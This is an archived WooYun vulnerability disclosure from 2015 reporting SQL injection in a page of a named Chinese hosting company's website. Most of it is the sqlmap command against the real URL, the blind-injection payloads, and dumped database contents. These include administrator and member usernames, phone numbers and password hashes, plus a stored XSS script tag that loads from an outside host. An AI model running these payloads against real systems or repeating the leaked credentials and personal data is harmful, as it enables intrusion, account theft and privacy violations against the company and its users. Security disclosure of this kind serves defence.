乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点:
sqlmap.py -u "http://www.enkj.com/jz/casedetails.asp?id=1"
存在注入
sqlmap identified the following injection points with a total of 62 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6375=6375 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: id=1 AND 3257=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)---web server operating system: Windowsweb application technology: ASP.NET, ASPback-end DBMS: Microsoft SQL Server 2005available databases [14]:[*] AdvertManager[*] db_cms[*] distribution[*] ENKJ_WebSite[*] EnkjCloud[*] EnkjOpenstack[*] Framework[*] FrameworkWeiXin[*] FreeHost[*] MainENKJ[*] master[*] model[*] msdb[*] tempdb
Database: EnkjCloudTable: Cloud_Sys_User[3 entries]+----+--------+-----+-------------+-------+-------------+--------------------+----------+----------+----------------------------------+| ID | RoleID | Sex | Phone | State | Mobile | AddDate | UserName | RealName | Password |+----+--------+-----+-------------+-------+-------------+--------------------+----------+----------+----------------------------------+| 1 | 1 | 0 | 13333333333 | 1 | 60972007 | 09 13 2013 5:00PM | admin | admin | 794fb66f659205fc166808fd38c708f3 || 2 | 2 | 0 | 18037333335 | 1 | 18037333335 | 10 29 2013 5:10PM | chenwd | 䢖蝥ᱎ㭠콾ٴ | b80bdd5c1eed585dc0b8e48a175fdf60 || 3 | 4 | 0 | 55139626 | 1 | 15137878583 | 11 29 2013 2:00PM | 띞 | 띞 | d639e8a8aa8ba2971bcc29b77551c47d |+----+--------+-----+-------------+-------+-------------+--------------------+----------+----------+----------------------------------+
back-end DBMS: Microsoft SQL Server 2005Database: EnkjCloud+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| dbo.Cloud_Log_BrowseLog | 805741 || dbo.Cloud_Log_UserLog | 87133 || dbo.Cloud_User_Member | 31650 || dbo.Cloud_Log_OperateLog | 19997 || dbo.Cloud_Product_Order | 4708 || dbo.Cloud_Product_CloudDisk | 2491 || dbo.Cloud_Product_Domain360 | 1626 || dbo.Cloud_Sys_IPAddressInfo | 1493 || dbo.Cloud_Warning_VmDataNormalHostIp | 1471 || dbo.Cloud_Product_ExtendOrder | 1407 || dbo.Cloud_Product_UserHost | 1109 || dbo.Cloud_Warning_NormalHostIp | 1030 || dbo.Cloud_Sys_RoleMenu | 147 || dbo.Cloud_Sys_Menu | 68 || dbo.Cloud_Sys_Template | 55 || dbo.Cloud_Product_PackagesPrice | 30 || dbo.Cloud_Sys_Template22 | 29 || dbo.Cloud_Sys_Host | 26 || dbo.Cloud_Sys_DataStore | 25 || dbo.Cloud_Product_DiskOrder | 22 || dbo.Cloud_Product_BandwidthPrice | 18 || dbo.Cloud_Product_HardwarePrice | 18 || dbo.Cloud_Sys_DataStore1 | 15 || dbo.Cloud_Product_Proposal | 13 || dbo.Cloud_Sys_DataCenter | 7 || dbo.Cloud_Product_BasePackages | 6 || dbo.Cloud_User_MemberType | 6 || dbo.Cloud_Product_Packages | 5 || dbo.Cloud_Sys_Role | 4 || dbo.Cloud_Sys_User | 3 || dbo.Table_1 | 3 || dbo.Cloud_Sys_OrderCode | 1 || dbo.sysdiagrams | 1 |+--------------------------------------+---------+
会员表存在3W多
Table: Cloud_User_Member[2 entries]+-------------+----------------------------------+----------+------------------------------------------+| username | password | realname | Email |+-------------+----------------------------------+----------+------------------------------------------+| huanshi | cd31a196cc0f3a3923842cce72efd1c8 | <blank> | <script src=http://xss.tw/2294></script> || wulibin1985 | dd4b21e9ef71e1291183a46b913ae6f2 | ॎ | [email protected] |+-------------+----------------------------------+----------+------------------------------------------+
发现千人痕迹啊xss
危害等级:无影响厂商忽略
忽略时间:2015-11-22 08:26
漏洞Rank:4 (WooYun评价)
暂无
